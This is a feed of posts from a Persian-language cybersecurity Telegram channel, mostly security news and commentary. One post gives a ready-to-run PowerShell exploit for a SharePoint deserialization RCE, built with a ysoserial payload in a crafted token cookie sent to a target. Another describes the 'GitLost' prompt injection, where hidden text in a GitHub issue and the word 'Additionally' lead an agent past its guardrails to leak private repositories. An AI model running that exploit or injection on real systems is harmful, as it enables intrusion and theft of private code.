Веб-версияОткрыть в Telegram
CCyberSecurity

CyberSecurity

@matitanium · канал · Технологии · в индексе с 2026-07-20
905подписчиков
328средний охват поста
36.2%ER — охват к подписчикам
8постов за 30 дней
C
بعد از کار با این سبک مدل ها: بنظرم روی پرامپت نویسی یه ریسرچ خوب داشته باشید. چرا؟ چون مهندسی پرامپت داستان عمیقی داره بخصوص توی حوزه امنیت شما دقیق باید مدل رو راهنمایی کنید تا بهترین ریزالت رو بده بهتون مثلا نحوه استفاده ماژولار از پرامپت ها استفاده بهینه و تو در تو یا تعریف ساب ایجنت ها منظور نهایی: برای پیاده سازی چیز دقیقی که تویه ذهنتون هست باید زبان دقیق مدل هارو بلد باشید
4 · 512 ·
C
CyberSecurity
Фотография
нажмите — покажем
✔️ چین با ZCode وارد رقابت جدی در ابزارهای هوش مصنوعی برنامه‌نویسی شد شرکت Z.ai از محیط توسعه هوشمند ZCode رونمایی کرد؛ یک IDE ایجنت‌محور که با مدل متن‌باز GLM-5.2 یکپارچه شده و رقیبی برای ابزارهایی مانند Cursor، Claude Code و GitHub Copilot محسوب می‌شود. محیط ZCode برای ویندوز، macOS و لینوکس منتشر شده و امکاناتی مانند برنامه‌ریزی، کدنویسی، تست، بازبینی کد و اجرای وظایف چندمرحله‌ای را در اختیار توسعه‌دهندگان قرار می‌دهد. یکی از قابلیت‌های جالب این ابزار، کنترل Agent از طریق تلگرام، وی‌چت و Feishu است؛ به‌طوری‌که می‌توان حتی از طریق موبایل روند اجرای پروژه را مشاهده و دستورات جدید ارسال کرد. نکته قابل‌توجه اینکه Z.ai تلاش کرده وابستگی خود را به زیرساخت‌های غربی کاهش دهد. مدل GLM-5.2 از سخت‌افزارهای داخلی چین از جمله Huawei Ascend پشتیبانی می‌کند و هم‌زمان با افزایش محدودیت‌های آمریکا علیه برخی مدل‌های هوش مصنوعی، به یکی از جدی‌ترین گزینه‌های متن‌باز برای برنامه‌نویسی تبدیل شده است. @kaliboys | کالی بویز
3 · 553 ·
CyberSecurity
Фотография
нажмите — покажем
✈️موج جدید «فیشینگ شبح» سامانه‌های امنیت ایمیل را دور می‌زند 🎥پژوهشگران امنیت سایبری از شناسایی موج جدیدی از حملات موسوم به Ghost Phishing خبر داده‌اند که با استفاده از کیت EvilTokens، سازمان‌ها و شرکت‌ها در آمریکا و اروپا را هدف قرار داده است. در این روش، محتوای صفحه فیشینگ به‌صورت رمزگذاری‌شده ارسال شده و تنها پس از باز شدن در مرورگر قربانی رمزگشایی می‌شود؛ موضوعی که باعث می‌شود بسیاری از سامانه‌های سنتی امنیت ایمیل و بررسی لینک‌ها قادر به شناسایی آن نباشند. 🎤این حملات با سوءاستفاده از قابلیت Microsoft Device Code، کاربران را به ورود قانونی به حساب Microsoft 365 ترغیب کرده و بدون سرقت مستقیم رمز عبور، امکان دسترسی مهاجمان به ایمیل‌ها، فایل‌ها و سرویس‌های ابری را فراهم می‌کنند. کارشناسان هشدار داده‌اند که برای مقابله با این تهدید، سازمان‌ها باید علاوه بر بررسی لینک‌ها، از ابزارهای تحلیل رفتار مرورگر و محیط‌های ایزوله (Sandbox) برای شناسایی صفحات فیشینگ پیشرفته استفاده کنند. ✈️@HackerNewsCyber
480 ·
C
Фотография
нажмите — покажем
نشت مخفیانه‌ی دیتا از ریپازیتوری‌های پرایوت گیت‌هاب با یه ترفند ساده‌ی هوش مصنوعی 📚 فکر کنید یه نفر بدون هیچ پسورد و دسترسی‌ای، بتونه کدهای مخفیانه‌تون رو توی گیت‌هاب بخونه. چطوری؟ با گول زدن ایجنت هوش مصنوعیِ خود گیت‌هاب! تیم Noma Labs یه آسیب‌پذیری خیلی خطرناک (به اسم GitLost) توی سیستم جدید Agentic Workflows گیت‌هاب پیدا کرده. داستان از این قراره که این ایجنت‌ها می‌تونن issueها رو بخونن و اتوماسیون انجام بدن. حالا هکرها چیکار می‌تونن بکنن؟ هکر کافیه بیاد تو یکی از ریپازیتوری‌های پابلیک شما یه Issue باز کنه و توش یه سری دستور مخفیانه به زبان انگلیسی (Prompt Injection) قایم کنه. ایجنت گیت‌هاب این متن رو می‌خونه، گول می‌خوره و به جای کار اصلیش، میره فایل‌ها و دیتای ریپازیتوری‌های پرایوتِ همون سازمان رو می‌خونه و برای هکر می‌فرسته! نکته‌ی جالب اینجاست: گیت‌هاب کلی گاردریل امنیتی چیده بود که دقیقاً جلوی همین اتفاق رو بگیره. اما محقق‌ها فهمیدن فقط با اضافه کردن کلمه‌ی "Additionally" (به‌علاوه/همچنین) توی پرامپت هک، مدل هوش مصنوعی کلا گیج می‌شه و به جای اینکه درخواست رو رد کنه، تمام محدودیت‌ها رو دور می‌زنه و دیتا رو لو میده. این دقیقاً نشون میده که توی سیستم‌های جدید هوش مصنوعی، همون متنی که ایجنت می‌خونه همزمان می‌تونه پاشنه آشیل و نقطه حمله باشه. حملات Prompt Injection الان دقیقاً دارن همون بلایی رو سر AI میارن که قبلاً SQL Injection سر وب‌سایت‌ها میاورد. البته این باگ به طور مسئولانه به گیت‌هاب گزارش شده، ولی حواستون به ایجنت‌هایی که به سورس‌کدهاتون دسترسی دارن باشه! 🔗 https://noma.security/blog/gitlost-how-we-tricked-githubs-ai-agent-into-leaking-private-repos ✅ Channel 💬 Group
4 · 520 ·
C
CyberSecurity
این کد poc مربوط به rce جدید sharepoint که deserial هست $n=[Guid]::NewGuid().ToString('N');$cb="http://remote/spse-cookie-rce-$n";$tmp="$env:TEMP\$n.bin";$cmd="powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing '$cb'";& 'ysoserial.exe' -g TypeConfuseDelegate -f BinaryFormatter -o raw -c $cmd --outputpath $tmp|Out-Null;Add-Type -AssemblyName System.IdentityModel;$raw=[IO.File]::ReadAllBytes($tmp);$cookie=[Convert]::ToBase64String(([System.IdentityModel.DeflateCookieTransform]::new()).Encode($raw));$token="<sc:SecurityContextToken xmlns:sc='http://schemas.xmlsoap.org/ws/2005/02/sc'><sc:Identifier>urn:unique-id:securitycontext:$n</sc:Identifier><Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>$cookie</Cookie></sc:SecurityContextToken>";$rstr="<t:RequestSecurityTokenResponse xmlns:t='http://schemas.xmlsoap.org/ws/2005/02/trust'><t:RequestedSecurityToken>$token</t:RequestedSecurityToken></t:RequestSecurityTokenResponse>";Write-Host "Callback: $cb";try{Invoke-WebRequest 'http://TARGET/_trust/default.aspx' -Method Post -Proxy 'http://127.0.0.1:8080' -ContentType 'application/x-www-form-urlencoded' -Body @{wa='wsignin1.0';wctx='http://TARGET/';wresult=$rstr} -UseBasicParsing -TimeoutSec 60}finally{Remove-Item $tmp -Force -ErrorAction SilentlyContinue} https://x.com/testanull/status/2079082982640668990
10 · 460 ·
C
CyberSecurity
Фотография
нажмите — покажем
Фотография
нажмите — покажем
Фотография
нажмите — покажем
Фотография
нажмите — покажем
وزارت دادگستری امریکا با همکاری FBI و اداره ملی تحقیقات فنلاند، Peter Stokes، یکی از هکرهای گروه هکری بزرگ Scattered Spider رو با همکاری مایکروسافت دستگیر کردن! گروه Scattered Spider یکی از گروه های هکری معروفی هست که طی سالهای اخیر به شرکتهای MGM، ردیت، DoorDash، Riot Games، MailChimp و غیره نفوذ کرده و از اونها بیش از 100 میلیون دلار باج گرفته! یکی از هکهای اخیر اونها هک شرکت جواهرسازی Tiffany بود که از اونها 8 میلیون دلار باج خواستن ولی این شرکت باج رو نداد اما کماکان به خاطر اسیب های عملیاتی که بهش وارد شد 2 میلیون دلار از این هک ضرر کرد. نکته عجیب در مورد بازداشت Peter Stokes که در حال حاضر 19 سالشه، همکاری عجیب مایکروسافت با FBI بوده که زنگ خطر بزرگی رو برای حریم شخصی کاربران ویندوزی به صدا دراورده. طبق اسناد دادگاه، FBI از طریق Global Device ID یا GDID لپتاپ این هکر، موفق شده ردپای این هکر رو در سرویسهای مختلف بهم وصل کنه و حتی استفاده از پروکسی و VPN هم تاثیری در مخفی کردن این هکر نداشته. شناسه GDID شناسه ای در دستگاه های ویندوزی هست که فقط با تعویض ویندوز یا تغییر سخت افزاری بزرگ (مثل تعویض مادربورد) تغییر میکنه و مثلا مایکروسافت برای فعالسازی ویندوز از اون استفاده میکنه. ولی طبق اسناد منتشر شده از دادگاه این هکر، مایکروسافت داده هایی داشته که میدونسته GDID دستگاه این هکر در چه زمانهایی، از چه سایتهایی بازدید کرده و با چه IPهایی متصل میشده. از جمله نمونه اونها این هست که مایکروسافت به FBI اطلاعاتی ارائه داده که نشون میده اکانتی با شناسه خاصی از نرم افزار ngrok برای تونل کردن کامپیوتر خودش به کامپیوتر یکی از شرکتهای قربانی استفاده کرده، این GDID در زمان خاصی با IP خاصی در تایلند بوده که این هکر با اون IP در اسنپ چت عکسهای خاصی منتشر کرده. یا مثلا این GDID در زمان خاصی با ایپی استونی (که ظاهرا خونه اش بوده) بازی Growtopia رو بازی کرده. در مثال دیگری این GDID وارد سایت Empire Hotel شده، که با تطبیق اون با زمان عکسهایی که این هکر در اسنپ چتش از این هتل منتشر کرده و همچنین در اون زمان با ایپی خاصی به اکانت اپلش دسترسی داشته، FBI با دقت بالایی موفق شده بفهمه که این شخص همون هکر Scattered Spider بوده. چنین سطح گسترده از اطلاعاتی که ویندوز به سرورهای م
18 · 699 ·
C
CyberSecurity
یک عامل هوش مصنوعی از کنترل خارج شد 🔹اوپن‌ای‌آی اعلام کرد که در یک آزمایش امنیتی، یک عامل خودمختار مبتنی بر مدل‌های پیشرفته این شرکت از محیط کنترل‌شده خارج شده و به اینترنت دسترسی پیدا کرده است. این عامل برای انجام مأموریت تعریف‌شده، زیرساخت‌های‌هاگینگ‌فیس را هدف یک حمله سایبری قرار داد. این رخداد بار دیگر نگرانی‌ها درباره مخاطرات امنیتی هوش مصنوعی پیشرفته را افزایش داده است. @ITSecurityComputer
2 · 566 ·
C
CyberSecurity
Ссылка
нажмите — покажем
یه تارگت بود داشتم تست میکردم و نیاز به بایپس waf داشت و این یکی akamai بود اگر خواستید برای xss بایپس کنید همچین وف هایی رو باید دنبال راههای alternative باشید تو این نوشن یه روش استفاده از dom clobbering رو براتون گفتم و یک اسکریپت هم توش هست برای پیدا کردن alternative برای کلمه window و document داشته باشید به درد میخوره https://cherry-event-b75.notion.site/DOM-Clobbering-WAF-Bypass-3af4f6d7dcce80fe919dcc27223a249e?source=copy_link
15 · 581 ·
C
CyberSecurity
⚠️ هشدار مهم لطفاً اطلاع‌رسانی کنید!! بر اساس گزارش‌های متعددی که به دست ما رسیده، شماری از کاربران پلتفرم «میلی‌گلد» اعلام کرده‌اند که در روند فروش، تسویه یا برداشت دارایی خود با مشکلاتی مواجه شده‌اند. همچنین گزارش‌هایی درباره اختلاف قابل‌توجه قیمت‌های اعلامی این پلتفرم با قیمت‌های رایج بازار دریافت شده است. موضوع زمانی جدی‌تر می‌شود که با وجود این گزارش‌ها و نگرانی‌های ایجادشده، تاکنون شفاف‌سازی کافی و روشنی درباره وضعیت موجود، نحوه تأمین طلا و فرآیند تسویه دارایی کاربران ارائه نشده است. اگر در این پلتفرم سرمایه دارید، توصیه می‌کنیم وضعیت دارایی، امکان برداشت و شرایط تسویه حساب خود را فوراً و با دقت بررسی کنید و تا زمان روشن‌شدن کامل موضوع، با احتیاط بیشتری تصمیم‌گیری کنید. ما هیچ پلتفرم، مجموعه یا روش سرمایه‌گذاری جایگزینی را پیشنهاد یا تأیید نمی‌کنیم. از مسئولان «میلی‌گلد» نیز انتظار می‌رود در سریع‌ترین زمان ممکن، به‌صورت شفاف و مستند درباره گزارش‌های منتشرشده، وضعیت دارایی کاربران، نحوه تأمین پشتوانه طلا و فرآیند تسویه توضیح دهند. با توجه به تعداد بالای کاربران این پلتفرم، در صورت تأیید وجود مشکل جدی در تأمین یا تسویه دارایی‌ها، تبعات مالی آن می‌تواند بسیار گسترده باشد. لطفاً این هشدار را منتشر کنید
8 · 569 ·
C
CyberSecurity
ه ثانیه دیر جنبیده بودم، جای نوشتن این پست داشتیم یه فاجعه امنیتی ناشی از AI رو جمع میکردیم. چند وقت پیش داشتم کدی رو که AI نوشته بود، قبل از دپلوی review میکردم. توی importها یه پکیج به چشمم خورد که یهجوری بود. همه چی تقریبا منطقی به نظر میرسید. اسمش دقیقا همون الگوی سایر پکیجها رو داشت اما تا حالا جایی ندیده بودمش. به تیم گفتم دست نگه دارن، کار روی پروداکشن نره. برگشتم روی استیج تا از ریشه بررسیش کنم. مدل AI فقط از روی توهم، یه اسم قانعکننده برای خودش ساخته بود؛ دقیقا مثل وقتی که با همون اطمینان یه فکت یا آمار جعلی تحویل میده. به این پدیده میگن هالوسینیتکردن. AI چیزی رو با اطمینان کامل تولید میکنه که یا نادرسته یا اصلا وجود نداره. پکیج رو سرچ کردم و موضوع عجیبتر شد. فهمیدم قضیه از یه اسم ساختگی خیلی فراتره... همون اسم، چند ماه قبل توسط یه ناشناس ثبت شده بود. README و توضیح نداشت. فقط یه پکیج مخرب که منتظر بود من، یا هر کس دیگهای توی یه محیط فینتک بدون بررسی accept بزنه و نصبش کنه. اگه شک نکرده بودم، الان داشتم با یه پروسهی کاملا متفاوت سر و کله میزدم. کنار تیم امنیت، دنبال این میگشتیم که مهاجم تا کجا نفوذ کرده، چه سرویسهایی رو تحت تاثیر قرار داده و چی از دیتای حساسمون بیرون رفته. با یه مقدار تحقیق متوجه شدم این یه اتفاق تصادفی نیست. این اسم های ساختی الگو دارن. وقتی AI هالوسینیت میکنه، معمولا اسمهای تکراری میسازه. و دقیقا همینجا مهاجم وارد میشه. لازم نیست اسم پکیجها رو حدس بزنه. کافیه خروجی مدلهای AI رو زیر نظر بگیره، ببینه کدوم اسم جعلی بیشتر تکرار میشه و همون اسم رو زودتر از همه ثبت کنه. بعدش کافیه داخل اون پکیج، کد خودش رو بنویسه. دقیقا همون چیزی که من داشتم. به این حمله میگن Slopsquatting. نسبتا جدیده و از محصولات عصر AIه 😂 تکاملیافتهی typosquatting قدیمیه، فقط این بار بهجای اشتباه تایپی کاربر، از اشتباه هوش مصنوعی سواستفاده میکنن. یه نمونهی خیلی معروف هم داره. پکیج جعلی به اسم "huggingface-cli" رو یکی ثبت کرد. فقط چون AI مدام اسمش رو پیشنهاد میداد. بیش از 30 هزار بار دانلود شد. نکتهای که این حمله رو خطرناکتر از یه باگ معمولی میکنه اینه که توی کد ریویو دنبال باگ منطقی میگردیم، نه دنبال اینکه اسم پکیج import شده واقعا وجود داره یا نه. اعتماد به AI، دقی
10 · 307 ·
C
CyberSecurity
Фотография
нажмите — покажем
✈ مایکروسافت نقشه تهدیدات برنامه‌های وب ابری را منتشر کرد ©️ مایکروسافت یک «ماتریس تهدیدات برنامه‌های وب ابری» منتشر کرده است که با تکیه بر چارچوب میتری اَتک (MITRE ATT&CK)، مسیرهای حمله به برنامه‌های ابری و سکوهای بدون سرور را از مرحله نفوذ تا دسترسی به منابع متصل دسته‌بندی می‌کند. ©️ بر اساس این چارچوب، مهاجم می‌تواند از آسیب‌پذیری برنامه، رابط‌های مدیریتی در معرض اینترنت، اعتبارنامه‌های استقرار یا حتی دستکاری مخزن کد و تصویرهای کانتینری برای ورود به محیط ابری استفاده کند. پس از دستیابی به اجرای کد، سرقت اطلاعات محیط اجرا و اعتبارنامه‌ها یا دسترسی به هویت بارکاری می‌تواند امکان دسترسی به منابع دیگری مانند پایگاه‌های داده، فضای ذخیره‌سازی و سرویس‌های هوش مصنوعی را فراهم کند. ©️ مایکروسافت همچنین خطراتی مانند ایجاد کارهای زمان‌بندی‌شده برای حفظ ماندگاری، تغییر محیط‌های آزمایشی برای دور زدن نظارت و غیرفعال‌کردن ثبت رویدادهای ابری را برجسته کرده است. ©️ این ماتریس نشان می‌دهد امنیت برنامه‌های ابری نباید صرفاً در سطح کد یا زیرساخت بررسی شود؛ زیرا یک نفوذ در برنامه می‌تواند از طریق هویت‌ها، اتصال‌دهنده‌ها و منابع متصل، به مسیر گسترده‌تری در محیط ابری تبدیل شود. 🌐 @HackerNewsCyber
7 · 374 ·
C
CyberSecurity
Фотография
нажмите — покажем
✔️ گزارش آنتروپیک از سوءاستفاده گسترده از Claude آنتروپیک در گزارش امنیتی جدید خود، موارد متعددی از سوءاستفاده گروه‌ها و نهادهای مختلف در سراسر جهان از Claude را منتشر کرده است. در بخشی از گزارش، چند عملیات مرتبط با ایران شناسایی شده که از هوش مصنوعی برای تولید و بازنویسی محتوا، تحلیل اطلاعات عمومی و فعالیت‌های سایبری استفاده کرده‌اند. در پرونده‌ای جداگانه، شبکه‌ای منتسب به MEK/NCRI حدود ۸۴۰۰ پست تلگرام یک فعال واقعی را به Claude داده بود تا سبک نوشتاری او را تقلید کرده و با هویتی مشابه با دیگران گفتگو کند. همچنین یک گروه مستقر در شمال یمن از Claude Code برای توسعه نرم‌افزار هدایت موشک و راکت استفاده کرده است. در بخش مربوط به چین نیز آنتروپیک می‌گوید Alibaba طی حدود دو ماه بیش از ۱۵۱ میلیون تعامل با Claude داشته و Moonshot AI نیز نزدیک به ۳۰۰ هزار درخواست کاربران Kimi را به Claude منتقل کرده است. آنتروپیک اعلام کرده حساب‌های مرتبط با موارد شناسایی‌شده را مسدود کرده است. @kaliboys | کالی بویز
4 · 551 ·
C
CyberSecurity
🔴 تحریم‌ها این‌بار به HTTPS بانک‌های ایرانی رسیدند! ماجرا چیه؟ 🤔 گزارش‌ها می‌گن بعضی از بانک‌های ایرانی به‌دلیل تحریم‌های آمریکا، در تأمین یا تمدید گواهی امنیتی SSL/TLS برای سایت‌های بانکی با مشکل مواجه شده‌اند و بعضی بانک‌ها مجبور به تغییر دامنه سایت خود شده‌اند. حالا SSL/TLS چیه؟ همون قفلی 🔒 که کنار آدرس سایت می‌بینید و به مرورگر می‌گه: «این سایت واقعاً همون سایتیه که ادعا می‌کنه و ارتباط شما باهاش رمزگذاری شده.» نکته مهم اینه که OFAC خودش صادرکننده گواهی SSL نیست؛ اما تحریم‌ها می‌تونن باعث بشن شرکت‌های بین‌المللی ارائه‌دهنده این خدمات، به بانک‌های تحریم‌شده سرویس ندن یا همکاری‌شون رو محدود کنن. یعنی تحریم فقط به پول و انتقال بانکی محدود نمی‌شه؛ حتی بعضی از زیرساخت‌های فنی مورد استفاده بانک‌ها برای ارائه خدمات اینترنتی هم می‌تونن تحت تأثیر قرار بگیرن. 📌 گزارش کامل: Digiato Global — گزارش تغییر دامنه و گواهی SSL بانک‌های ایرانی
5 · 486 ·
C
CyberSecurity
GIF
IMG_9626.MP4 · 5.3 МБ · нажмите — покажем
یک روز همچیز از اینجا شروع شد… محل عکس بک گراند Windows XP بعد 25 سال ببینید تپه چه شکلی شده
3 · 343 ·
C
فقط این صندوق ها نیستند بانک ها هم هستند اگر پول در این بانک ها دارید خارج کنید بانک سرمایه : زیان انباشته حدود ۷۹ هزار میلیارد تومان ! کفایت سرمایه منفی بیش از ۲۵۰ درصد بانک ایران‌زمین : زیان انباشته ده‌ ها هزار میلیارد تومانی و کفایت سرمایه به‌ شدت منفی بانک دی : کفایت سرمایه منفی بانک سپه : ناترازی ساختاری و کفایت سرمایه پایین مؤسسه اعتباری ملل : کفایت سرمایه منفی
2 · 188 ·
C
CyberSecurity
Ссылка
нажмите — покажем
یه تحقیق امنیتی جالب از تیم SpiderLabs منتشر شده که نشون می‌ده صفحهٔ «رمز عبورم رو فراموش کردم» مایکروسافت (همون SSPR - Self-Service Password Reset) بدون اینکه لاگین کنی، اطلاعات زیادی دربارهٔ حساب‌های سازمان‌ها لو می‌ده. 🕵️ ماجرا چیه؟ وقتی می‌ری تو صفحهٔ passwordreset.microsoftonline.com و ایمیل یه نفر رو می‌زنی، سرور مایکروسافت رفتار متفاوتی نشون می‌ده بسته به اینکه: ۱️⃣ اون ایمیل اصلاً حساب داره یا نه اگه حساب وجود نداشته باشه، فوری برمی‌گردی به صفحهٔ اول. اگه وجود داشته باشه، حتی اگه بازیابی رمز براش فعال نباشه، یه پیام دیگه می‌بینی. یعنی فقط با امتحان کردن ایمیل‌ها (مثلاً از لینکدین یا سایت شرکت) می‌شه فهمید کدوم‌ها واقعی‌ان — بدون اینکه هیچ رمزی امتحان کنی. ۲️⃣ چه روش‌های امنیتی‌ای براش ثبت شده اگه بازیابی فعال باشه، صفحه نشون می‌ده اون آدم رمزش رو با پیامک بازیابی می‌کنه، با اپ احرازهویت، یا با یه ایمیل دیگه. این خیلی مهمه چون: کسی که فقط با «ایمیل جایگزین» محافظت شده = هدف ضعیف کسی که با اپ احرازهویت (مثل Authenticator) محافظت شده = هدف سخت‌تر ۳️⃣ آیا حساب ادمینه یا نه 🎯 نکتهٔ جالب: مایکروسافت بازیابی رمز رو برای حساب‌های ادمین همیشه فعال نگه می‌داره، حتی اگه کل سازمان این قابلیت رو خاموش کرده باشه. پس اگه یه سازمان SSPR رو برای کاربران عادی بسته باشه ولی یه حساب هنوز جواب بده، تقریباً مطمئنی که اون حساب ادمینه! ⚠️ چرا مهمه؟ یه مهاجم با این تکنیک می‌تونه بدون هیچ حمله‌ای: فهرست ایمیل‌های حدسی رو تبدیل کنه به لیست حساب‌های تأییدشده بفهمه کدوم حساب‌ها امنیت ضعیف دارن (هدف اول برای فیشینگ) حساب‌های ادمین رو شناسایی کنه روش دقیق حمله رو متناسب با نوع MFA انتخاب کنه (مثلاً برای SMS بره سراغ سیم‌سواپ) جالبه که قبلاً یه کپچا جلوی این صفحه بود ولی از اوت ۲۰۲۶ مایکروسافت حذفش کرد و فقط محدودیت نرخ درخواست گذاشت. محقق‌ها حتی یه ابزار پایتون به اسم ResetSpy ساختن که این کار رو خودکار می‌کنه و روی گیت‌هاب هم منتشرشه. 🛡 راه‌حل برای سازمان‌ها بازیابی رمز رو فقط برای گروه خاصی فعال کنید، نه همه روش‌های ضعیف (ایمیل جایگزین، سؤال امنیتی) رو حذف کنید و فقط اپ احرازهویت/تلفن بذارید برای حساب‌های ادمین از MFA مقاوم در برابر فیشینگ (مثل کلید امنیتی FIDO2) استفاده کنید لاگ‌های En
3 · 125 ·

Открытая публичная лента из поискового индекса ChatCrawler — «Google по публичному Telegram»; обновляется по мере обхода площадки. Время — UTC.

Только публичный контент, официальный API Telegram. О проекте · Вопросы · Чего мы не делаем · Убрать страницу из выдачи · Каталог · Поиск · Как мы считаем